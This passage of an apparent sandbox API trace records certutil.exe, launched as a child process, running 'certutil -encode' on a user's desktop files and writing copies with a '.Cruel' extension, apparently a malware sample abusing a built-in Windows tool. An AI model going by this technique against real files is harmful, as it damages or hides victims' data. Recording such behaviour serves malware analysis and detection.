lpBuffer=0xf1c92de240*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0xf1c92de1f4, lpReserved=0x0 | out: lpBuffer=0xf1c92de240*, lpNumberOfCharsWritten=0xf1c92de1f4*=0x1) returned 1 [0264.076] GetFileAttributesExW (in: lpFileName="VOv-CkMzVt4YRw.odp.Cruel" (normalized: "c:\\users\\fd1hvy\\desktop\\vov-ckmzvt4yrw.odp.cruel"), fInfoLevelId=0x0, lpFileInformation=0xf1c92df250 | out: lpFileInformation=0xf1c92df250*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc7ee691a, ftCreationTime.dwHighDateTime=0x1d6141f, ftLastAccessTime.dwLowDateTime=0xc7ee691a, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xc7faece5, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x13160)) returned 1 [0264.076] _vsnwprintf (in: _Buffer=0xf1c92df258, _BufferCount=0xb, _Format="%d", _ArgList=0xf1c92df248 | out: _Buffer="361") returned 3 [0264.076] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x169, lpBuffer=0xf1c92df010, cchBufferMax=128 | out: lpBuffer="Output Length = %d") returned 0x12 [0264.077] LocalAlloc (uFlags=0x0, uBytes=0x26) returned 0x2cd99fb7250 [0264.077] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0264.077] _vsnwprintf (in: _Buffer=0xf1c92de240, _BufferCount=0x1ff, _Format="Output Length = %d", _ArgList=0xf1c92df298 | out: _Buffer="Output Length = 78176") returned 21 [0264.077] GetFileType (hFile=0x50) returned 0x2 [0264.077] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xf1c92de240*, nNumberOfCharsToWrite=0x15, lpNumberOfCharsWritten=0xf1c92de1f4, lpReserved=0x0 | out: lpBuffer=0xf1c92de240*, lpNumberOfCharsWritten=0xf1c92de1f4*=0x15) returned 1 [0264.246] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0264.246] _vsnwprintf (in: _Buffer=0xf1c92de240, _BufferCount=0x1ff, _Format="\n", _ArgList=0xf1c92df298 | out: _Buffer="\n") returned 1 [0264.246] GetFileType (hFile=0x50) returned 0x2 [0264.246] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xf1c92de240*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0xf1c92de1f4, lpReserved=0x0 | out: lpBuffer=0xf1c92de240*, lpNumberOfCharsWritten=0xf1c92de1f4*=0x1) returned 1 [0264.278] LocalFree (hMem=0x2cd99fc09b0) returned 0x0 [0264.279] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0264.279] _vsnwprintf (in: _Buffer=0xf1c92df2b8, _BufferCount=0xb, _Format="%d", _ArgList=0xf1c92df2a8 | out: _Buffer="2022") returned 4 [0264.279] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x7e6, lpBuffer=0xf1c92df070, cchBufferMax=128 | out: lpBuffer="%ws: -%ws command completed successfully.") returned 0x29 [0264.279] LocalAlloc (uFlags=0x0, uBytes=0x54) returned 0x2cd99f98d90 [0264.279] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0264.279] _vsnwprintf (in: _Buffer=0xf1c92de2a0, _BufferCount=0x1ff, _Format="%ws: -%ws command completed successfully.", _ArgList=0xf1c92df2f8 | out: _Buffer="CertUtil: -encode command completed successfully.") returned 49 [0264.279] GetFileType (hFile=0x50) returned 0x2 [0264.279] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xf1c92de2a0*, nNumberOfCharsToWrite=0x31, lpNumberOfCharsWritten=0xf1c92de254, lpReserved=0x0 | out: lpBuffer=0xf1c92de2a0*, lpNumberOfCharsWritten=0xf1c92de254*=0x31) returned 1 [0264.301] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0264.302] _vsnwprintf (in: _Buffer=0xf1c92de2a0, _BufferCount=0x1ff, _Format="\n", _ArgList=0xf1c92df2f8 | out: _Buffer="\n") returned 1 [0264.302] GetFileType (hFile=0x50) returned 0x2 [0264.302] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xf1c92de2a0*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0xf1c92de254, lpReserved=0x0 | out: lpBuffer=0xf1c92de2a0*, lpNumberOfCharsWritten=0xf1c92de254*=0x1) returned 1 [0264.308] LocalFree (hMem=0x0) returned 0x0 [0264.309] LocalFree (hMem=0x2cd99fa4d70) returned 0x0 [0264.309] LocalFree (hMem=0x2cd99f9a2d0) returned 0x0 [0264.309] SetLastError (dwErrCode=0x80070716) [0264.309] _vsnwprintf (in: _Buffer=0xf1c92df328, _BufferCount=0xb, _Format="%d", _ArgList=0xf1c92df318 | out: _Buffer="511") returned 3 [0264.309] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x1ff, lpBuffer=0xf1c92df0e0, cchBufferMax=128 | out: lpBuffer="Command Succeeded") returned 0x11 [0264.309] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x2cd99fb7220 [0264.309] PostQuitMessage (nExitCode=0) [0264.309] GetMessageW (in: lpMsg=0xf1c92df920, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0xf1c92df920) returned 0 [0264.309] LocalFree (hMem=0x2cd99fab900) returned 0x0 [0264.309] LocalFree (hMem=0x2cd99fb74f0) returned 0x0 [0264.309] LocalFree (hMem=0x0) returned 0x0 [0264.310] GetModuleHandleW (lpModuleName="certadm.dll") returned 0x0 [0264.311] GetLastError () returned 0x7e [0264.311] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0264.311] GetProcAddress (hModule=0x7ffcdebe0000, lpProcName="DllMain") returned 0x7ffcdebe1530 [0264.311] DllMain () returned 0x1 [0264.311] LocalFree (hMem=0x2cd99fabba0) returned 0x0 [0264.312] LocalFree (hMem=0x2cd99fa4c10) returned 0x0 [0264.312] LocalFree (hMem=0x2cd99fb6fb0) returned 0x0 [0264.312] LocalFree (hMem=0x2cd99fb7250) returned 0x0 [0264.312] LocalFree (hMem=0x2cd99f98d90) returned 0x0 [0264.312] LocalFree (hMem=0x2cd99fb7220) returned 0x0 [0264.312] LocalFree (hMem=0x2cd99f9ce90) returned 0x0 [0264.312] LocalFree (hMem=0x2cd99fa49a0) returned 0x0 [0264.312] GetModuleHandleW (lpModuleName="certenroll.dll") returned 0x0 [0264.312] GetLastError () returned 0x7e [0264.312] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0264.312] GetProcAddress (hModule=0x7ffcdebe0000, lpProcName="DllMain") returned 0x7ffcdebe1530 [0264.312] DllMain () returned 0x1 [0264.313] exit (_Code=0) Thread: id = 92 os_tid = 0x1280 Process: id = "34" image_name = "certutil.exe" filename = "c:\\windows\\system32\\certutil.exe" page_root = "0x1c9b2000" os_pid = "0xd24" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x1190" cmd_line = "certutil -encode \"WDqhYWbTT.csv.Sister\" \"WDqhYWbTT.csv.Cruel\"" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 93 os_tid = 0x10f8 [0264.795] GetStartupInfoW (in: lpStartupInfo=0x46bae7fb70 | out: lpStartupInfo=0x46bae7fb70*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="certutil -encode \"WDqhYWbTT.csv.Sister\" \"WDqhYWbTT.csv.Cruel\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0264.797] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff70ad80000 [0264.797] __set_app_type (_Type=0x1) [0264.797] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff70ae6cd90) returned 0x0 [0264.797] __wgetmainargs (in: _Argc=0x7ff70aed3898, _Argv=0x7ff70aed38a0, _Env=0x7ff70aed38a8, _DoWildCard=0, _StartInfo=0x7ff70aed38b4 | out: _Argc=0x7ff70aed3898, _Argv=0x7ff70aed38a0, _Env=0x7ff70aed38a8) returned 0 [0264.800] _onexit (_Func=0x7ff70ae745a0) returned 0x7ff70ae745a0 [0264.800] _onexit (_Func=0x7ff70ae746c0) returned 0x7ff70ae746c0 [0264.801] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffce9120000 [0264.801] GetProcAddress (hModule=0x7ffce9120000, lpProcName="WerSetFlags") returned 0x7ffce913a530 [0264.801] WerSetFlags () returned 0x0 [0264.801] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0264.801] __iob_func () returned 0x7ffcea2dea00 [0264.801] _fileno (_File=0x7ffcea2dea30) returned 1 [0264.801] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0264.801] _wsetlocale (category=1, locale=".OCP") returned="English_United States.437" [0264.803] _wsetlocale (category=3, locale=".OCP") returned="English_United States.437" [0264.803] _wsetlocale (category=4, locale=".OCP") returned="English_United States.437" [0264.803] _wsetlocale (category=5, locale=".OCP") returned="English_United States.437" [0264.804] GetConsoleOutputCP () returned 0x1b5 [0264.804] _vsnwprintf (in: _Buffer=0x46bae7fae0, _BufferCount=0xb, _Format=".%d", _ArgList=0x46bae7fa08 | out: _Buffer=".437") returned 4 [0264.804] _wsetlocale (category=2, locale=".437") returned="English_United States.437" [0264.804] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0264.805] GetFileType (hFile=0x50) returned 0x2 [0264.805] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffce9120000 [0264.806] GetProcAddress (hModule=0x7ffce9120000, lpProcName="SetThreadUILanguage") returned 0x7ffce913a990 [0264.806] SetThreadUILanguage (LangId=0x0) returned 0x409 [0264.806] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1=".exe", cchCount1=-1, lpString2=".exe", cchCount2=-1) returned 2 [0264.807] GetCommandLineW () returned="certutil -encode \"WDqhYWbTT.csv.Sister\" \"WDqhYWbTT.csv.Cruel\"" [0264.807] LocalAlloc (uFlags=0x0, uBytes=0x12) returned 0x168663fb440 [0264.807] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x168663ecd20 [0264.807] LocalFree (hMem=0x168663fb440) returned 0x0 [0264.807] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x168663eba10 [0264.807] LocalAlloc (uFlags=0x0, uBytes=0x22) returned 0x168663eb950 [0264.807] LocalFree (hMem=0x168663eba10) returned 0x0 [0264.807] LocalFree (hMem=0x168663ecd20) returned 0x0 [0264.807] LocalFree (hMem=0x0) returned 0x0 [0264.808] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0264.808] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0264.808] GetCommandLineW () returned="certutil -encode \"WDqhYWbTT.csv.Sister\" \"WDqhYWbTT.csv.Cruel\"" [0264.808] LocalAlloc (uFlags=0x0, uBytes=0x12) returned 0x168663fb600 [0264.808] GetSystemTime (in: lpSystemTime=0x46bae7f7d0 | out: lpSystemTime=0x46bae7f7d0*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x10, wHour=0x12, wMinute=0x31, wSecond=0x27, wMilliseconds=0x15d)) [0264.808] SystemTimeToFileTime (in: lpSystemTime=0x46bae7f7d0, lpFileTime=0x46bae7f7c8 | out: lpFileTime=0x46bae7f7c8) returned 1 [0264.808] FileTimeToLocalFileTime (in: lpFileTime=0x46bae7f7c8, lpLocalFileTime=0x46bae7f790 | out: lpLocalFileTime=0x46bae7f790) returned 1 [0264.808] FileTimeToSystemTime (in: lpFileTime=0x46bae7f790, lpSystemTime=0x46bae7f500 | out: lpSystemTime=0x46bae7f500) returned 1 [0264.809] GetDateFormatW (in: Locale=0x400, dwFlags=0x1, lpDate=0x46bae7f500, lpFormat=0x0, lpDateStr=0x46bae7f610, cchDate=128 | out: lpDateStr="4/16/2020") returned 10 [0264.809] GetTimeFormatW (in: Locale=0x400, dwFlags=0x2, lpTime=0x46bae7f500, lpFormat=0x0, lpTimeStr=0x46bae7f510, cchTime=128 | out: lpTimeStr="8:49 PM") returned 8 [0264.809] _vsnwprintf (in: _Buffer=0x46bae7f51e, _BufferCount=0x78, _Format=" %02u.%03us", _ArgList=0x46bae7f4e8 | out: _Buffer=" 39.349s") returned 8 [0264.809] LocalAlloc (uFlags=0x0, uBytes=0x34) returned 0x168663fdfa0 [0264.809] SetLastError (dwErrCode=0x80070716) [0264.809] _vsnwprintf (in: _Buffer=0x46bae7f598, _BufferCount=0xb, _Format="%d", _ArgList=0x46bae7f588 | out: _Buffer="948") returned 3 [0264.809] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x3b4, lpBuffer=0x46bae7f350, cchBufferMax=128 | out: lpBuffer="Begin") returned 0x5 [0264.809] LocalAlloc (uFlags=0x0, uBytes=0xc) returned 0x168663fba20 [0264.809] LocalAlloc (uFlags=0x0, uBytes=0x640) returned 0x168663f4190 [0264.809] LocalFree (hMem=0x168663fdfa0) returned 0x0 [0264.809] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x46bae7f840 | out: lpSystemTimeAsFileTime=0x46bae7f840*(dwLowDateTime=0xc8728ce7, dwHighDateTime=0x1d6141f)) [0264.809] GetLocalTime (in: lpSystemTime=0x46bae7f878 | out: lpSystemTime=0x46bae7f878*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x10, wHour=0x14, wMinute=0x31, wSecond=0x27, wMilliseconds=0x15e)) [0264.809] SystemTimeToFileTime (in: lpSystemTime=0x46bae7f878, lpFileTime=0x46bae7f850 | out: lpFileTime=0x46bae7f850) returned 1 [0264.809] CompareFileTime (lpFileTime1=0x46bae7f850, lpFileTime2=0x46bae7f840) returned 1 [0264.809] _vsnwprintf (in: _Buffer=0x46bae7f888, _BufferCount=0x13, _Format="GMT %s %.2f", _ArgList=0x46bae7f818 | out: _Buffer="GMT + 2.00") returned 10 [0264.810] LocalFree (hMem=0x168663fb600) returned 0x0 [0264.810] GetModuleHandleW (lpModuleName="certca.dll") returned 0x7ffcde520000 [0264.810] FindResourceW (hModule=0x7ffcde520000, lpName=0x1, lpType=0x10) returned 0x7ffcde5e0090 [0264.810] LoadResource (hModule=0x7ffcde520000, hResInfo=0x7ffcde5e0090) returned 0x7ffcde5e00b0 [0264.810] LockResource (hResData=0x7ffcde5e00b0) returned 0x7ffcde5e00b0 [0264.810] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="VS_VERSION_INFO", cchCount1=-1, lpString2="VS_VERSION_INFO", cchCount2=-1) returned 2 [0264.810] _vsnwprintf (in: _Buffer=0x7ff70aed6890, _BufferCount=0x3f, _Format="%u.%u.%u.%u", _ArgList=0x46bae7f8b8 | out: _Buffer="10.0.15063.447") returned 14 [0264.810] GetACP () returned 0x4e4 [0264.810] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0264.810] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x168663fb540 [0264.810] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x168663fb540, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0264.810] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x168663fdfe0 [0264.810] _vsnwprintf (in: _Buffer=0x168663fdfe0, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0x46bae7f908 | out: _Buffer="10.0.15063.447 retail") returned 21 [0264.810] LocalFree (hMem=0x168663fb540) returned 0x0 [0264.810] LocalFree (hMem=0x0) returned 0x0 [0264.811] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0264.811] GetACP () returned 0x4e4 [0264.811] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0264.811] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x168663fb700 [0264.811] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x168663fb700, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0264.811] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x168663fe020 [0264.811] _vsnwprintf (in: _Buffer=0x168663fe020, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0x46bae7f908 | out: _Buffer="10.0.15063.447 retail") returned 21 [0264.811] LocalFree (hMem=0x168663fb700) returned 0x0 [0264.811] LocalFree (hMem=0x0) returned 0x0 [0264.811] GetACP () returned 0x4e4 [0264.811] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0264.811] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x168663fb440 [0264.811] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x168663fb440, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0264.811] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x168663fdd60 [0264.811] _vsnwprintf (in: _Buffer=0x168663fdd60, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0x46bae7f938 | out: _Buffer="10.0.15063.447 retail") returned 21 [0264.811] LocalFree (hMem=0x168663fb440) returned 0x0 [0264.811] LocalFree (hMem=0x168663fdfe0) returned 0x0 [0264.811] LocalFree (hMem=0x168663fe020) returned 0x0 [0264.811] LocalFree (hMem=0x168663fdd60) returned 0x0 [0264.811] LoadIconW (hInstance=0x0, lpIconName=0x7f00) returned 0x10027 [0264.812] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0264.812] GetStockObject (i=0) returned 0x900010 [0264.812] RegisterClassW (lpWndClass=0x46bae7fa60) returned 0xc1a2 [0264.812] CreateWindowExW (dwExStyle=0x0, lpClassName="CertUtil", lpWindowName="CertUtil Application", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=-2147483648, nHeight=-2147483648, hWndParent=0x0, hMenu=0x0, hInstance=0x7ff70ad80000, lpParam=0x0) returned 0xc02c6 [0264.826] NtdllDefWindowProc_W () returned 0x0 [0264.827] NtdllDefWindowProc_W () returned 0x1 [0264.835] NtdllDefWindowProc_W () returned 0x0 [0264.858] UpdateWindow (hWnd=0xc02c6) returned 1 [0264.858] PostMessageW (hWnd=0xc02c6, Msg=0x400, wParam=0x0, lParam=0x168663e217e) returned 1 [0264.858] GetMessageW (in: lpMsg=0x46bae7fab0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x46bae7fab0) returned 1 [0264.858] TranslateMessage (lpMsg=0x46bae7fab0) returned 0 [0264.858] DispatchMessageW (lpMsg=0x46bae7fab0) returned 0x0 [0264.858] NtdllDefWindowProc_W () returned 0x0 [0264.858] GetMessageW (in: lpMsg=0x46bae7fab0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x46bae7fab0) returned 1 [0264.858] TranslateMessage (lpMsg=0x46bae7fab0) returned 0 [0264.858] DispatchMessageW (lpMsg=0x46bae7fab0) returned 0x0 [0264.858] LocalAlloc (uFlags=0x0, uBytes=0x6a) returned 0x168663f30e0 [0264.859] LocalAlloc (uFlags=0x0, uBytes=0x76) returned 0x168663f03d0 [0264.859] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="p", cchCount2=-1) returned 1 [0264.859] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="pin", cchCount2=-1) returned 1 [0264.859] SetLastError (dwErrCode=0x80070716) [0264.859] _vsnwprintf (in: _Buffer=0x46bae7f4b8, _BufferCount=0xb, _Format="%d", _ArgList=0x46bae7f4a8 | out: _Buffer="465") returned 3 [0264.859] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x1d1, lpBuffer=0x46bae7f270, cchBufferMax=128 | out: lpBuffer="Command Line") returned 0xc [0264.859] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x168663ebd10 [0264.859] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0264.859] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0264.859] GetEnvironmentVariableW (in: lpName="certsrv_rawhex", lpBuffer=0x46bae7f250, nSize=0x104 | out: lpBuffer="\x01") returned 0x0 [0264.859] GetLastError () returned 0xcb [0264.860] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0264.860] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0264.860] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0264.860] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0264.860] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0264.860] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0264.860] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0264.860] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0264.860] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0264.860] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0264.860] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0264.860] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0264.860] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0264.860] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0264.860] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0264.860] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0264.860] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0264.860] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0264.860] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0264.860] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0264.860] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0264.860] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Cryptography\\AutoEnrollment", ulOptions=0x0, samDesired=0x20019, phkResult=0x46bae7ef18 | out: phkResult=0x46bae7ef18*=0x23c) returned 0x0 [0264.860] LocalAlloc (uFlags=0x0, uBytes=0x5e) returned 0x168663ef310 [0264.860] RegQueryValueExW (in: hKey=0x23c, lpValueName="RawHex", lpReserved=0x0, lpType=0x46bae7f488, lpData=0x46bae7f4b8, lpcbData=0x46bae7f480*=0x4 | out: lpType=0x46bae7f488*=0x0, lpData=0x46bae7f4b8*=0x0, lpcbData=0x46bae7f480*=0x4) returned 0x2 [0264.860] LocalFree (hMem=0x168663ef310) returned 0x0 [0264.860] RegCloseKey (hKey=0x23c) returned 0x0 [0264.861] LocalFree (hMem=0x0) returned 0x0 [0264.861] CryptFindOIDInfo (dwKeyType=0x1, pvKey=0x7ff70ae80270, dwGroupId=0x7) returned 0x1686640cbe0 [0264.872] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL", cchCount1=-1, lpString2="szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL", cchCount2=-1) returned 2 [0264.872] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="stdio", cchCount2=-1) returned 1 [0264.872] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="LegacyCertSelectionUI", cchCount2=-1) returned 1 [0264.872] lstrcmpW (lpString1="encode", lpString2="uSAGE") returned -1 [0264.872] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="gp", cchCount2=-1) returned 1 [0264.872] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="loc", cchCount2=-1) returned 1 [0264.872] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="ent", cchCount2=-1) returned 1 [0264.872] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="q", cchCount2=-1) returned 1 [0264.872] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="dump", cchCount2=-1) returned 3 [0264.872] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="dumpPFX", cchCount2=-1) returned 3 [0264.872] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="asn", cchCount2=-1) returned 3 [0264.872] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="", cchCount2=-1) returned 3 [0264.872] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="decodehex", cchCount2=-1) returned 3 [0264.872] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="encodehex", cchCount2=-1) returned 1 [0264.872] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="decode", cchCount2=-1) returned 3 [0264.872] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="encode", cchCount2=-1) returned 2 [0264.872] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x16866411680 [0264.872] GetComputerNameW (in: lpBuffer=0x16866411680, nSize=0x46bae7f480 | out: lpBuffer="NQDPDE", nSize=0x46bae7f480) returned 1 [0264.873] GetComputerNameExW (in: NameType=0x3, lpBuffer=0x0, nSize=0x46bae7f450 | out: lpBuffer=0x0, nSize=0x46bae7f450) returned 0 [0264.873] GetLastError () returned 0xea [0264.873] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x168663fb560 [0264.873] GetComputerNameExW (in: NameType=0x3, lpBuffer=0x168663fb560, nSize=0x46bae7f450 | out: lpBuffer="NQdPdE", nSize=0x46bae7f450) returned 1 [0264.873] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0264.877] CertCreateCertificateContext (dwCertEncodingType=0x1, pbCertEncoded=0x16866411d20, cbCertEncoded=0x12425) returned 0x0 [0264.880] CertCreateCRLContext (dwCertEncodingType=0x1, pbCrlEncoded=0x16866411d20, cbCrlEncoded=0x12425) returned 0x0 [0264.883] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x4, pbEncoded=0x16866411d20, cbEncoded=0x12425, dwFlags=0x8000, pDecodePara=0x46bae7f330, pvStructInfo=0x46bae7f3c0, pcbStructInfo=0x46bae7f3b4 | out: pvStructInfo=0x46bae7f3c0, pcbStructInfo=0x46bae7f3b4) returned 0 [0264.883] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x15, pbEncoded=0x16866411d20, cbEncoded=0x12425, dwFlags=0x8000, pDecodePara=0x46bae7f330, pvStructInfo=0x46bae7f3c0, pcbStructInfo=0x46bae7f3b4 | out: pvStructInfo=0x46bae7f3c0, pcbStructInfo=0x46bae7f3b4) returned 0 [0264.883] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x3b, pbEncoded=0x16866411d20, cbEncoded=0x12425, dwFlags=0x8000, pDecodePara=0x46bae7f330, 